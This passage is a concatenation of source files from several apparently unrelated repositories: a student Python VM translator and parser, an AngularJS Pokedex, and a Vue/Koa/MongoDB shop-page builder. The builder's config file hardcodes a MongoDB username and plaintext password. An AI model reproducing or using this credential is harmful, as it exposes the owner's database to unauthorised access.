opDict = {'op':"-"}
self.output+=self.runTemplate("binary",opDict)
elif lineLower=="and":
opDict = {'op':"&"}
self.output+=self.runTemplate("binary",opDict)
elif lineLower=="or":
opDict = {'op':"|"}
self.output+=self.runTemplate("binary",opDict)
elif lineLower=="neg":
opDict={"op":"-"}
self.output+=self.runTemplate("unary",opDict)
elif lineLower=="not":
opDict={"op":"!"}
self.output+=self.runTemplate("unary",opDict)
elif lineLower=="eq":
opDict={'op':"EQ",'opInc':opCount}
self.output+=self.runTemplate("comp",opDict)
opCount+=1
elif lineLower=="gt":
opDict={'op':"GT",'opInc':opCount}
self.output+=self.runTemplate("comp",opDict)
opCount+=1
elif lineLower=="lt":
opDict={'op':"LT",'opInc':opCount}
self.output+=self.runTemplate("comp",opDict)
opCount+=1
def opCodePUSH(self,lineArray):
lineLower= lineArray[1].lower()
if lineLower=="constant":
opDict={'var':lineArray[2],'am':'A'}
output=self.runTemplate("push",opDict)
elif lineLower=="argument":
opDict={'var':"ARG",'x':lineArray[2]}
output=self.runTemplate("segment",opDict)
elif lineLower=="local":
opDict={'var':"LCL",'x':lineArray[2]}
output=self.runTemplate("segment",opDict)
elif lineLower=="static":
opDict={'var':(self.fileName+"."+str(self.staticIndex)),'am':"M"}
output=self.runTemplate("push",opDict)
self.staticIndex+=1
elif lineLower=="this":
opDict={'var':"THIS",'x':lineArray[2]}
output=self.runTemplate("segment",opDict)
elif lineLower=="that":
opDict={'var':"THAT",'x':lineArray[2]}
output=self.runTemplate("segment",opDict)
elif lineLower=="pointer":
opDict={'var':(int(lineArray[2])+3),'am':'M'}
output=self.runTemplate("push",opDict)
elif lineLower=="temp":
opDict={'var':(int(lineArray[2])+5),'am':'M'}
output=self.runTemplate("push",opDict)
return output+"\n"
def opCodePOP(self,lineArray):
lineLower= lineArray[1].lower()
if lineLower=="argument":
opDict={'var':"ARG",'x':lineArray[2]}
output=self.runTemplate("segpop",opDict)
elif lineLower=="local":
opDict={'var':"LCL",'x':lineArray[2]}
output=self.runTemplate("segpop",opDict)
elif lineLower=="static":
opDict={'var':(self.fileName+"."+str(self.staticIndex))}
output=self.runTemplate("pop",opDict)
self.staticIndex+=1
elif lineLower=="this":
opDict={'var':"THIS",'x':lineArray[2]}
output=self.runTemplate("segpop",opDict)
elif lineLower=="that":
opDict={'var':"THAT",'x':lineArray[2]}
output=self.runTemplate("segpop",opDict)
elif lineLower=="pointer":
opDict={'var':(int(lineArray[2])+3)}
output=self.runTemplate("pop",opDict)
elif lineLower=="temp":
opDict={'var':(int(lineArray[2])+5)}
output=self.runTemplate("pop",opDict)
return output+"\n"
def runTemplate(self,fileName,dict):
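        # Load the named .tpl file, treat it as a string.Template, and return
        # it with the placeholders in `dict` substituted.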
try:
fi=open(fileName+".tpl","r")
except:
sys.exit(fileName+".tpl not found!")
output=Template(fi.read()).substitute(dict)
return output<file_sep># Name: <NAME>
# Course: CS410
# Assignment: PY02
# Due Date: 2/13/13
import sys
class Parser(object):
def __init__(self,stringStream,vmMode):
self.vmMode=vmMode
self.fileIn=stringStream.split("\n")
self.fileIn = [line.strip() for line in self.fileIn]
self.lineIndex=0
self.lines=[len(self.fileIn),0]
self.characters=[-1,-1] #offset condition.
self.blockComments=[[0,0],[0,0]]
self.eolComments=[[0,0],[0,0]]
self.state=0
self.output=""
while self.hasMoreCommands():
self.advance()
def hasMoreCommands(self):
if (self.lineIndex>=(len(self.fileIn))):
self.outputFix()
return self.lineIndex<(len(self.fileIn))
def advance(self):
# TABLE OF STATES:
# 0 : NORMAL
# 1 : BEGINNING OF COMMENT
# 2 : LINE COMMENT
# 3 : BLOCK COMMENT
# 4 : END BLOCK COMMENT CHAR
# 5 : TAB OR SPACE
currLine = self.fileIn[self.lineIndex]
for c in currLine:
c=c.upper()
self.characters[0]+=1
#Ending line comments
if self.state==0:
if c=="/":
self.state=1
elif c==" " or c=="\t":
self.state=5 if self.vmMode else self.state
else:
self.output+=str(c)
self.characters[1]+=1
elif self.state==1:
if c=='/':
self.state=2
self.eolComments[0][0]+=1
elif c=='*':
self.blockComments[0][0]+=1
self.state=3
else:
self.output+="/"+str(c)
self.characters[0]+=1
self.characters[1]+=1
self.state=0
elif self.state==3:
self.blockComments[0][0]+=0 if self.hasMoreCommands() else 1 #Math adjustment for premature EOF
self.blockComments[0][1]+=1
if c=="*":
self.state=4
elif self.state==4:
if c=="/":
self.state=0
elif c=="*":#This accounts for a repeating asterisk condition.
self.state=4
else:
self.state=3
elif self.state==5:
if c!=" " and c!="\t":
if c=="/":
self.state=1
else:
self.output+=" "+str(c)
self.characters[1]+=2
self.state=0
self.state=0 if self.state==2 else self.state
self.output+="\n" if self.state==0 else ""
self.lines[1]+=1 if(self.state!=3) or (self.lineIndex==0) else 0
self.characters[0]+=0 if self.lineIndex== 0 else 1
self.characters[1]+=0 if self.state==0 else 1
self.blockComments[0][1]+=1 if self.state==3 else 0
self.lineIndex+=1
def outputFix(self):
output=self.output.split("\n")
self.output=""
for line in output:
if line!="":
self.output+=line
if line!=output[-1]:
self.output+="\n"
if(len(self.output)!=0 and self.output[-1]=="\n"):
self.output=self.output[:-1]
def stats(self):
print("\t\tINPUT\t\tOUTPUT")
print("Lines\t\t"+str(self.lines[0])+"\t\t"+str(self.lines[1]))
print("Characters\t"+str(self.characters[0])+"\t\t"+str(self.characters[1]))
print("Block Comments\t"+str(self.blockComments[0][0])+"\t\t"+str(self.blockComments[1][0]))
print(" Characters\t"+str(self.blockComments[0][1])+"\t\t"+str(self.blockComments[1][1]))
print("EOL Comments\t"+str(self.eolComments[0][0])+"\t\t"+str(self.eolComments[0][1]))
print(" Characters\t"+str(self.eolComments[1][0])+"\t\t"+str(self.eolComments[1][1]))
|
99fabfe3be2608b7c4135884e45cca81eb19b16d
|
[
"Python"
] | 4
|
Python
|
hubbazoot/ecs07
|
833e727d70e9c179cd30cdf24b75f79551a053b3
|
9bde72e587041525b82aebe3ae16b7d0cdd60e4b
|
refs/heads/master
|
<file_sep># Pokedex
Pokedex made with PokeAPI.
<file_sep>angular
.module('pokedexApp', ['ui.router'])
.controller('HomeController', HomeController)
.config(function($stateProvider, $urlRouterProvider) {
$urlRouterProvider.otherwise('/home');
$stateProvider
.state('home', {
url: '/home',
templateUrl: 'public/app/views/home/home.html'
});
});
function HomeController($http) {
var vm = this;
vm.name = "teste";
vm.getPokemonData = getPokemonData;
vm.idPokemon = 1;
vm.previous = previous;
vm.next = next;
vm.getPokemonData(vm.idPokemon);
function getPokemonData(pokemonId){
$http.get("http://pokeapi.co/api/v2/pokemon/"+ pokemonId).then(function(response) {
vm.pokeImageUrl = response.data.sprites.front_default;
vm.pokemonName = response.data.name;
vm.pokemonTypes = response.data.types;
});
}
function previous(){
if(vm.idPokemon >= 2){
vm.idPokemon--;
getPokemonData(vm.idPokemon);
}
}
function next(){
vm.idPokemon++;
getPokemonData(vm.idPokemon);
}
}
|
62b51e05399b22a7cbf95168e59a7306889e3ec7
|
[
"Markdown",
"JavaScript"
] | 2
|
Markdown
|
almermbn/pokeapi
|
b36611ebea1919e814b1ec5817f7601abaf028a5
|
4fb3c0618c09efa5740b0461be17f0c3f70d77bb
|
refs/heads/master
|
<repo_name>Julone/QianDianQM<file_sep>/vue.config.js
const CompressionWebpackPlugin = require('compression-webpack-plugin')
const productionGzipExtensions = ['js', 'css']
const UglifyJsPlugin = require('uglifyjs-webpack-plugin')
const webpack = require('webpack')
const isProduction = process.env.NODE_ENV === 'production'
module.exports = {
publicPath: './',
assetsDir: 'static',
devServer: {
proxy: {
'/api': {
target: 'http://localhost:3000/',
changeOrigin: true,
pathRewrite: {
'^/api': ''
}
},
}
},
configureWebpack: {
plugins: isProduction? [
// Ignore all locale files of moment.js
new webpack.IgnorePlugin(/^\.\/locale$/, /moment$/),
new UglifyJsPlugin({
uglifyOptions: {
compress: {
drop_debugger: true,
drop_console: true
},
},
sourceMap: false,
parallel: true
}),
      // Configure compression-webpack-plugin to gzip the build assets
new CompressionWebpackPlugin({
algorithm: 'gzip',
test: new RegExp('\\.(' + productionGzipExtensions.join('|') + ')$'),
threshold: 10240,
minRatio: 0.8
})
] : [],
externals: {
// 'vue': 'Vue',
// 'jquery' : '$',
}
},
}<file_sep>/src/views/Box/api.js
import axios from 'axios'
export const getRouterList = ({queryString}) =>{
return axios({
method:'get',
url: '/api/router-list',
params: {
queryString
}
})
}
export const postPreviewData = data => {
return axios({
method: 'post',
url: '/api/api/postPreviewData',
data: {data: data},
})
}
export const getPreviewData = data => {
return axios({
method: 'get',
url: '/api/api/getPreviewData',
})
}
export const postTemplateData = ({data,title}) => {
return axios({
method: 'post',
url: '/api/api/postTemplateData',
data: {data,title},
})
}
export const getTemplateData = templateID => {
return axios({
method: 'get',
url: '/api/api/getTemplateData',
params: {
templateID
}
})
}
export const getTemplateList = () => {
return axios({
method: 'get',
url: '/api/api/getTemplateList'
})
}
export const removeTemplate = (templateID)=>{
return axios({
method: 'post',
url: "/api/api/removeTemplateByID",
params: {
templateID
}
})
}
export const updateTemplate = (templateID,data) => {
return axios({
method: 'post',
url: "/api/api/updateTemplate",
data:{
data,
templateID,
}
})
}
export const getShopitemList = (params={})=>{
return axios({
url:'http://localhost:3000/api/getShopitemList',
method: 'get',
params
})
}<file_sep>/src/router/index.js
import Vue from 'vue'
import VueRouter from 'vue-router'
Vue.use(VueRouter)
const routes = [{
path: '/',
redirect: '/box',
},
{
path: '/box',
component: () => import('@/views/Box/index-container.vue'),
children: [{
path: '',
component: () => import('@/views/Box/index-wrapper.vue'),
children: [{
path: '',
redirect: '/box/block'
},
{
path: 'block',
name: 'block',
component: () => import('@/views/Box/module/block.vue'),
children: [{
path: 'dialog',
name: 'dialog',
component: () => import('@/views/Box/toolBar/dialog_coupon.vue'),
}]
},
{
path: 'picture',
component: () => import('@/views/Box/module/picture.vue'),
},
{
path: 'template',
component: () => import('@/views/Box/module/template.vue'),
}
]
}]
},
]
const router = new VueRouter({
mode: 'hash',
base: process.env.BASE_URL,
routes
})
export default router<file_sep>/src/utils/directive.js
import vue from 'vue';
import {
addStyle
} from './dom';
var previewFunction = (el, binding) => {
el.__container = document.querySelector("#previewIMG");
if (!el.__container) {
el.__container = document.createElement("div");
el.__container.id = "previewIMG";
el.__container.innerHTML = "<img />";
document.body.appendChild(el.__container);
addStyle(`
#previewIMG { position: fixed; top: 20px; min-height: 200px; pointer-events: none; z-index:100000; height: auto; width: auto;left: 20px; opacity: 0; transition: all ease-out .4s; }
#previewIMG.active{ opacity: 1; }
#previewIMG.rightPos{ left: unset; right: 20px;; }
#previewIMG img { max-height: 80vh; max-width: 50vw; box-shadow: 0px 12px 14px -9px #767676; display: block; border-radius: 5px; border: 5px solid rgb(64,158,255); border-image: linear-gradient(240deg,rgb(43, 235, 228),rgb(64,158,255)) 1 stretch; }
`, `#${el.__container.id}`);
}
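    // Show the enlarged preview on the side of the screen opposite the
    // cursor so it never sits under the pointer.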
el.addEventListener("mouseover", e => {
var x = e.clientX;
var w = document.body.clientWidth;
el.__container.classList[x / w < 0.5 ? 'add' : 'remove']('rightPos');
var img = document.createElement("img");
img.src = binding.value;
img.onload = () => {
var innerImg = el.__container.querySelector("img");
innerImg.src = binding.value;
innerImg.style.maxWidth = binding.modifiers.small? '40vw': binding.modifiers.medium? '45vw':'50vw'
};
el.__container.classList.add("active");
});
el.addEventListener("mouseout", e => {
el.__container.classList.remove("active");
});
}
vue.directive('preview', {
bind(el, binding) {
previewFunction(el, binding);
console.log('v-preview bind');
},
unbind(el,binding){
el.__container.classList.remove('active');
}
})<file_sep>/NODE_SERVER/public/js/preview.js
function init(){
handleData([...data],function(){
var swiper = new Swiper('.swiper-container',{
pagination: {
el: '.swiper-pagination',
type: 'fraction',
},
navigation: {
nextEl: '.swiper-button-next',
prevEl: '.swiper-button-prev',
},
});
});
}
window.onload = ()=>{
init();
}
function handleData(data, callback){
var result = data.reduce((t,el) => {
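        // Rescale each block from its design width to the current device
        // width so absolutely-positioned hotspots keep their proportions.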
el.ratio = document.body.clientWidth / el.baseWidth;
el.baseWidth = document.body.clientWidth;
el.baseHeight = el.baseHeight * el.ratio;
switch (el.type) {
case 'block': t += templateBlock(el);break;
case 'lunbo': t += templateLunbo(el);break;
case 'video': t += templateVideo(el);break;
default:break;
}
return t;
}, '')
document.querySelector('#root').innerHTML = result;
callback();
}
function templateLunbo(data){
var source = document.querySelector('#lunboTemplate').innerHTML;
var t = Handlebars.compile(source);
data.lunboList.forEach(el=>{
el.image = el.image.replace('/api/','/');
})
return t(data);
}
function templateBlock(data){
data.bgUrl.url = data.bgUrl.url.replace('/api/','/');
var source = document.querySelector('#blockTemplate').innerHTML;
var t = Handlebars.compile(source);
var ratio = data.ratio;
// data.baseHeight = ratio * data.baseHeight;
data.mapList.forEach(mel => {
var { x, y, width, height } = mel;
mel.x = (x * ratio);
mel.y = (y * ratio);
mel.width = width * ratio;
mel.height = height * ratio;
})
return t(data);
}
function templateVideo(data) {
var source = document.querySelector('#videoTemplate').innerHTML;
var t = Handlebars.compile(source);
data.videoInfo.videoImage = data.videoInfo.videoImage.replace('/api/','/')
return t(data);
}
<file_sep>/src/store/index.js
import Vue from 'vue'
import Vuex from 'vuex'
import box from './box'
import * as storage from './../utils/storage'
Vue.use(Vuex)
export default new Vuex.Store({
state: {
imgList: [ { "url": "https://img14.360buyimg.com/cms/jfs/t1/111883/20/2391/38719/5ea1b0f2Ee27cf3fe/5de52ee5d008e65d.jpg",
"type": "all", "image_type": "jpg", "width": 1920, "height": 600, "remark": "", "create_time": 1585189414550 },
{ "url": "https://img10.360buyimg.com/cms/jfs/t1/100141/24/18178/55217/5e8d4501Ed3c42e03/c0c444b912e7e531.jpg",
"type": "all", "image_type": "jpg", "width": 1920, "height": 600, "remark": "", "create_time": 1585189414831 },
{ "url": "https://img11.360buyimg.com/cms/jfs/t1/128777/36/2712/80911/5ec8ad6dE27a79bbe/e8f9aba130b7f6f8.jpg",
"type": "all", "image_type": "jpg", "width": 1920, "height": 600, "remark": "", "create_time": 1585189415098 },
{ "url": "https://img11.360buyimg.com/cms/jfs/t1/47816/39/11180/155441/5d834bbaEc00cc8a2/16b2f80f833606ed.jpg",
"type": "all", "image_type": "jpg", "width": 1920, "height": 600, "remark": "", "create_time": 1585189415322 },
{ "url": "https://img13.360buyimg.com/cms/jfs/t1/114278/20/7735/38758/5ec55169Eb0df7963/080c1c1d612727d9.jpg",
"type": "all", "image_type": "jpg", "width": 1920, "height": 600, "remark": "", "create_time": 1585189415509 },],
typeLabelList: new Map([
[
"block",
{
label: "板块",
type: "primary",
color: "#409EFF",
value: "block",
icon: 'el-icon-files'
}
],
[
"lunbo",
{
label: "轮播",
type: "success",
color: "#67c23a",
value: "lunbo",
icon: 'el-icon-picture-outline'
}
],
[
"video",
{
label: "视频",
type: "warning",
color: "#e6a23c",
value: "video",
icon: 'el-icon-video-camera'
}
],
[
"list",
{
label: "列表",
type: "danger",
color: "#409EFF",
value: "block",
icon: 'el-icon-files'
}
],
]),
curTemplateID: storage.getStorage({name: 'templateID'})
},
mutations: {
ADD_IMAGE_LIST(state, val) {
function ImageModel({
url,
type,
width,
height
}) {
return {
url: url ? url : '',
type: 'all',
image_type: type,
width: width,
height: height,
remark: '', //备注信息
create_time: Date.now()
}
}
state.imgList.push(new ImageModel(val));
},
SET_CUR_TEMPLATE_ID(state, val){
state.curTemplateID = val;
storage.setStorage({name: 'templateID', type:'session', content: val});
}
},
actions: {},
getters: {
getTypeLabelList: (state, getters) => val => {
return state.typeLabelList.get(val);
},
imgList(state) {
return state.imgList
},
allImageList(state){
return state.imgList.filter(el => el.type == 'all')
},
lunboImageList(state,getters) {
return getters.allImageList.concat(state.imgList.filter(el => el.type == 'lunbo'))
},
blockImageList(state,getters) {
return getters.allImageList.concat(state.imgList.filter(el => el.type == 'block'))
},
videoImageList(state,getters) {
return getters.allImageList.concat(state.imgList.filter(el => el.type == 'video'))
}
},
modules: {
box
}
})<file_sep>/NODE_SERVER/routes/index.js
const router = require('koa-router')()
const MongoClient = require('mongodb').MongoClient;
var {ObjectId} = require('mongodb')
var {mongoURL: url} = require('./config')
router.get('/', async (ctx, next) => {
await ctx.render('index', {
title: 'Hello Koa 2! This is API website'
})
})
router.get('/preview', async(ctx) => {
var insertedID = ctx.request.query.insertedID || '5e7b0db35750c74f10322c91';
if(insertedID.length != 24) return ;
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
console.log("Connected successfully to server");
var db = client.db('already');
db.collection('preview').findOne({_id: ObjectId(insertedID)},{}, (err,rs) =>{
if(err) rej(err)
res(rs);
})
})
}).then(r=>r).catch(e=>{
console.log(e);
})
console.log(rs);
await ctx.render('preview', {
code: 200,
msg: 'got',
data:rs
});
})
router.get('/template', async(ctx) => {
var insertedID = ctx.request.query.templateID ;
if(insertedID.length != 24) return ;
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
console.log("Connected successfully to server");
var db = client.db('already');
db.collection('template').findOne({_id: ObjectId(insertedID)},{}, (err,rs) =>{
if(err) rej(err)
res(rs);
})
})
}).then(r=>r).catch(e=>{
console.log(e);
})
console.log(rs);
await ctx.render('template', {
code: 200,
msg: 'got',
data:rs.data.box.boxList
});
})
module.exports = router
<file_sep>/src/main.js
import Vue from 'vue'
import App from './App.vue'
import router from './router'
import store from './store'
//element-ui
import ElementUI from 'element-ui';
import 'element-ui/lib/theme-chalk/index.css';
// * custom-config
import '@/assets/global.less'; // global css
import './utils/directive'; // global vue-directives
import './components/toast.js';
//draggable
import VueDraggableResizable from 'vue-draggable-resizable'
import 'vue-draggable-resizable/dist/VueDraggableResizable.css'
//swiper
import swiper from "vue-awesome-swiper";
import "swiper/dist/css/swiper.css";
//draggable-for list sortable
import draggable from "vuedraggable";
//splitPane - view split
import splitPane from 'vue-splitpane'
//qrcode - create qrcode for scanning
import QrcodeVue from 'qrcode.vue'
Vue.component('vue-draggable-resizable',VueDraggableResizable)
Vue.component('split-pane', splitPane);
Vue.component('qrcode',QrcodeVue);
Vue.component('draggable',draggable);
Vue.use(swiper);
Vue.use(ElementUI);
Vue.config.productionTip = false;
new Vue({
router,
store,
render: h => h(App)
}).$mount('#app')
<file_sep>/NODE_SERVER/routes/api_v1.js
var router = require('koa-router')({prefix: '/api'});
var fs = require('fs');
var path = require('path')
var imageSize = require('image-size')
const MongoClient = require('mongodb').MongoClient;
var {ObjectId} = require('mongodb')
var {mongoURL: url} = require('./config')
router.get('/', ctx => {
ctx.body ='fsd'
})
router.post('/action/upload', async ctx => {
try {
const file = ctx.request.files.file;
var date = new Date();
var todayDate = `${date.getFullYear()}-${date.getMonth() + 1}-${date.getDate()}`
var filename = file.size + "-" + file.name;
        // Build the destination path and stream the uploaded file to disk
let filePath = path.join(__dirname, './../public/upload/', todayDate + '/' + filename);
const fileDir = path.join(__dirname, './../public/upload/', todayDate);
if (!fs.existsSync(fileDir)) {
fs.mkdirSync(fileDir);
}
const upStream = fs.createWriteStream(filePath);
const render = fs.createReadStream(file.path).pipe(upStream);
console.log(filePath);
let data = await new Promise(res=>{
upStream.on('close',function () {
let imgInfo = {
url: '/upload/' + todayDate + '/' + filename,
...imageSize(filePath)
}
res(imgInfo)
})
})
ctx.body = {
code: 200,
msg: '上传图片成功!',
data: data
}
}
catch (e) {
console.log(e);
}
});
router.post('/postPreviewData',async ctx => {
var data = ctx.request.body.data || [];
if(!Array.isArray(data)) data = JSON.parse(data)
console.log(data);
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
console.log("Connected successfully to server");
var db = client.db('already');
db.collection('preview').insertOne({data: data},(err,rs)=>{
if(err) rej(err);
res(rs);
})
});
})
ctx.body = {
code: 200,
msg: '数据保存成功',
insertedID: rs.insertedId
}
});
router.get('/getPreviewData',async ctx => {
try{
var insertedID = ctx.request.query.insertedID || '';
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
console.log("Connected successfully to server");
console.log(client);
if(err) throw new Error(err)
var db = client.db('already');
db.collection('preview').findOne({_id: ObjectId(insertedID)},{}, (err,rs) =>{
rs.data.forEach((el)=>{
el.bgUrl.url = el.bgUrl.url.replace('/api/',"http://192.168.36.119:3000/")
el.lunboList.forEach(lb => {
lb.image = lb.image.replace('/api/',"http://192.168.36.119:3000/")
});
delete el.previewURL;
switch (el.type) {
case 'block': delete el.lunboList;delete el.lunboConfig;delete el.videoInfo;break
case 'lunbo': delete el.bgUrl;delete el.mapList;
delete el.videoInfo;break
case 'video': delete el.lunboList;delete el.lunboConfig;delete el.bgUrl;delete el.mapList;break
}
return el;
})
res(rs.data);
})
});
})
ctx.body = {
code: 200,
msg: 'got',
data:rs
}
}
catch(e){
console.log(e);
ctx.body = {code:23}
}
});
router.post('/postTemplateData',async ctx => {
var data = ctx.request.body.data || {};
var title = ctx.request.body.title;
var addTime = new Date();
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
var db = client.db('already');
db.collection('template').insertOne({data,title,addTime},(err,rs)=>{
if(err) rej(err);
res(rs);
})
});
})
ctx.body = {
code: 200,
msg: '数据保存成功',
templateID: rs.insertedId
}
});
router.post('/updateTemplate',async ctx => {
var data = ctx.request.body.data || {};
var templateID = ctx.request.body.templateID;
var updateTime = new Date();
var rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
var db = client.db('already');
db.collection('template').findOneAndUpdate({
_id: ObjectId(templateID)
},{
$set:{
data,
updateTime
}
},(err,rs)=>{
if( err || !(rs.lastErrorObject.updatedExisting) ){
rej(-1)
}else{
res(rs)
}
})
})
}).then(r=>{
return {
code: 200,
newData: r.value,
msg: '更新成功'
}
}).catch(e=>{
return {
code: 110,
msg: '更新失败'
}
});
console.log(rs);
ctx.body = rs;
});
router.get('/getTemplateData',async ctx => {
try{
var insertedID = ctx.request.query.templateID || '5e7da15c03949552d010da63';
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
var db = client.db('already');
db.collection('template').findOne({_id: ObjectId(insertedID)},{}, (err,rs) =>{
res(rs);
})
});
})
ctx.body = {
code: 200,
msg: '模板数据加载成功',
data: rs.data,
templateID: rs._id,
}
}
catch(e){
ctx.body = {code:233, msg: '找不到模板'}
}
});
router.get('/getTemplateList',async ctx => {
try{
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
var db = client.db('already');
db.collection('template').find({},{
projection:{
_id:1,
title:1,
addTime:1
},
sort:{
addTime: -1
}
}).toArray((err,doc)=>{
console.log(err,doc);
if(err) rej([])
res(doc);
})
});
})
ctx.body = {
code: 200,
msg: 'gotten',
data: rs,
}
}
catch(e){
ctx.body = {code:23}
}
});
router.post('/removeTemplateByID', async ctx => {
try{
var templateID = ctx.request.query.templateID;
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
var db = client.db('already');
db.collection('template').deleteOne({
_id: ObjectId(templateID)
},{}, (err,rs) => {
if(err) rej(-1);
res(1)
})
});
})
ctx.body = {
code: 200,
msg: 'ok'
}
}
catch(e){
ctx.body = {code:23}
}
});
router.get('/getShopitemList', async ctx => {
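    // Paginated product listing: an explicit skuId lookup or a free-text
    // query raises the limit to effectively disable paging; otherwise
    // results are filtered by brand and paged with skip/limit.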
var {curPage = 1, limit = 10, brand = '', skuId, queryString} = ctx.request.query;
var filter = {};
console.log(skuId);
if( skuId != undefined){
limit = 1000;
filter.skuId = {$in:skuId.split(',')}
console.log(filter);
}else if(queryString != ''){
limit = 1000;
filter.skuId = new RegExp(queryString);
}else {
filter.brand = new RegExp(brand);
if(limit == -1) limit = 1000;
}
var s = await require('./mongo').select({
collection: 'shopitem',
filter,
options:{
limit: limit / 1,
skip: ((curPage - 1) * limit) / 1,
projection: ['_id', 'skuId','name','img','price']
}
});
s.total = await require('./mongo').db().then(async r=>{
return await new Promise((res,rej)=>{
r.collection('shopitem').countDocuments(filter,{}).then(r=>{
res(r);
}).catch(e=>{
rej(e)
})
})
}).catch(e=>e);
ctx.body = Object.assign(s, {curPage,limit,brand,_: new Date().toLocaleString()});
})
module.exports = router;
<file_sep>/src/components/toast.js
import Vue from 'vue';
import {
Message
} from 'element-ui'
import _ from '@/utils/other.js'
import './toast.less';
var myToast = function (msg, type = 'info') {
var obj = {
center: true,
customClass: 'julone_toast_class',
type: type == 'loading' ? 'info' : type,
iconClass: type == 'loading' ? 'el-icon-loading' : null,
duration: 2000,
// showClose:true,
offset: document.body.clientHeight / 3 * 2,
}
var temp = _.isObject(msg) ? msg : ({
message: msg
})
myToast.closeAll();
var inst = Message(Object.assign(obj, temp))
clearAni(inst.$el);
return inst
}
function clearAni($el){
$el.style.transition = `opacity .3s,top .4s,transform .4s`;
setTimeout(() => {
$el.style.animation = `none`;
}, 500)
}
var type = ['success', 'info', 'warning', 'error', 'loading', 'plain'];
for (let t of type) {
myToast[t] = function (msg) {
let temp = _.isObject(msg) ? msg : ({ message: msg })
return myToast(temp, t)
}
}
myToast.close = Message.close;
myToast.closeAll = Message.closeAll;
Vue.prototype.$toast = myToast
export default myToast<file_sep>/NODE_SERVER/routes/mongo.js
const MongoClient = require('mongodb').MongoClient;
var {ObjectId} = require('mongodb');
// const url = 'mongodb://127.0.0.1:27017/?gssapiServiceName=mongodb';
var {mongoURL: url} = require('./config')
module.exports = {
async db(){
return await new Promise((res,rej) => {
MongoClient.connect(url, { useNewUrlParser: true, useUnifiedTopology: true }, function(err, client) {
var db = client.db('already');
res(db);
});
})
},
async select({collection, filter={}, options = {}}){
if(filter._id) filter._id = ObjectId(filter._id);
var result = await new Promise(async (resolve,reject) => {
var db = await this.db();
db.collection(collection).find(filter,options).toArray((err,docs)=>{
return err? reject(err): resolve(docs);
})
}).then(docs=>({
code: 200, data: docs
})).catch(e=>({
msg: e.errmsg,
code: e.code,
data: e
}));
return result;
},
}
<file_sep>/NODE_SERVER/routes/config.js
module.exports = {
mongoURL: 'mongodb+srv://julone:qwer183371456@<EMAIL>.<EMAIL>/qdian?retryWrites=true&w=majority'
}<file_sep>/src/store/boxMap.js
export default {
state:{
mapActiveID: -1,
map_item_ID: 1,
},
mutations:{
ADD_BOX_MAP(state,{ x,y,width,height }){
if(width < 20 || height < 20) return;
var item = state.boxList.find(el => el.id === state.boxActiveID).mapList;
state.mapActiveID = state.map_item_ID;
item.push({
id: state.map_item_ID++,
x,y,width,height,
action: {
type: null,
data: {}
}
});
},
REMOVE_BOX_MAP(state, {boxID,mapID}){
var mapList = state.boxList.find(el => el.id === boxID).mapList;
var mapIndex = mapList.indexOf(mapList.find(el=>el.id == mapID));
if(mapIndex != -1){
mapList.splice(mapIndex,1);
}
state.mapActiveID = -1;
},
DRAG_BOX_MAP(state, {boxID,mapID,x,y}){
var mapList = state.boxList.find(el => el.id === boxID).mapList;
var mapItem = mapList.find(el => el.id == mapID);
mapItem = Object.assign(mapItem,{x,y});
},
RESIZE_BOX_MAP(state,{ x, y, width, height, mapID,boxID}){
var mapList = state.boxList.find(el => el.id === boxID).mapList;
var mapItem = mapList.find(el => el.id == mapID);
mapItem = Object.assign(mapItem,{x,y,width,height});
},
SET_MAP_ACTIVE_ID(state, val){
state.mapActiveID = val
},
SET_MAP_ACTION_ITEM_ACTION_TYPE(state,{boxID,val}){
var mapList = state.boxList.find(el => el.id === state.boxActiveID).mapList;
var mapItem = mapList.find(el=>el.id == state.mapActiveID);
mapItem.action.type = val;
},
SET_MAP_ACTION_ITEM_ACTION_DATA(state,val){
var mapList = state.boxList.find(el => el.id === state.boxActiveID).mapList;
var mapItem = mapList.find(el=>el.id == state.mapActiveID);
mapItem.action.data = val;
}
},
actions:{
},
getters:{
activeMapItem:(state,getters)=>{
if(getters.activeMapList.length && state.mapActiveID > 0){
return getters.activeMapList.find(el=>el.id == state.mapActiveID)
}else {
return null;
}
},
mapActiveID(state,getters){
return state.mapActiveID
},
activeMapItemActionType(state,getters){
if(getters.activeMapItem){
return getters.activeMapItem.action.type
}else {
return ""
}
},
activeMapList:(state,getters) =>{
if(getters.boxActiveItem){
return getters.boxActiveItem.mapList
}else{
return [];
}
},
}
}<file_sep>/src/utils/other.js
import { format } from "element-ui/lib/utils/date";
export const timeFormat = (val, param = 'yyyy/M/d HH:mm:ss') =>{
return format(new Date(val),param)
};
export function isObject(target){
return Object.prototype.toString.call(target) === '[object Object]'
}
export default {
isObject
}
<file_sep>/README.md
# Shop personalized homepage builder
-- a merchant-customizable shop homepage, similar to Taobao's store pages
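
Pages are described as a render tree of plain objects (see `src/backup/data2.js`); a minimal node in that format looks like this sketch (values illustrative):

    {
      tag: 'div',               // element to render
      className: 'item',
      css: { width: '518px', height: '206px' },
      children: [               // nested clickable hotspots
        { tag: 'a', url: '/a', css: 'position:absolute;left:0;top:0;width:30%;height:100px' }
      ]
    }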
<file_sep>/src/backup/data2.js
export default [{
css: {
backgroundImage: `https://img10.360buyimg.com/imgzone/jfs/t1/61154/6/9626/225675/5d7466c3Ee42061f6/4938be3b7e869df5.jpg`,
width: '518px',
height: '206px'
},
className: 'item',
tag: "div",
children: [{
tag: 'a',
css: 'position:absolute;left:0;top:0;width:30%;height:100px',
url: '/a',
events: {
click: {
funName: 'info',
data: {
params: {
id: 23432423,
}
}
}
},
},
{
tag: 'a',
css: 'position:absolute;right:0;top:0;width:50%;height:100%',
url: '/b?id=2343242304893208',
children: [{
tag: 'a',
css: 'position:absolute;right:0;top:0;width:20%;height:100%',
url: '/b',
children: [{
tag: 'a',
css: 'position:absolute;right:0;top:0;width:10%;height:100%',
url: '/b',
}]
}]
},
]
}, {
css: {
width: '518px',
height: '473px',
backgroundImage: `https://img10.360buyimg.com/imgzone/jfs/t1/103831/10/6483/428573/5df349faE2f2d4147/a45aecf79cb796e2.jpg`,
},
